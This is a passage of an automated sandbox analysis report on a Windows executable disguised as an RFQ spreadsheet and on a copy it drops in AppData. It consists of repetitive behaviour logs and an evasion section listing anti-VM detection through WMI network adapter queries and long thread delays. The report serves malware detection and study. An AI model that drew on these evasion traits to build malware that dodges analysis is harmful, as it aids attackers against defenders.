                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: E90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 8970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 9970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 9C70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: AC70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 5070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: EE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 2CB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMemory allocated: 1060000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199891Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199766Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199547Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199435Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199219Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198889Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198563Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198344Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198125Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198016Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197906Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197797Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197688Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197563Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197438Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197313Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197203Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197094Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196969Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196859Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196681Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196531Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196422Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196312Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196203Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196094Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195984Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195875Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195766Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195656Jump to behavior
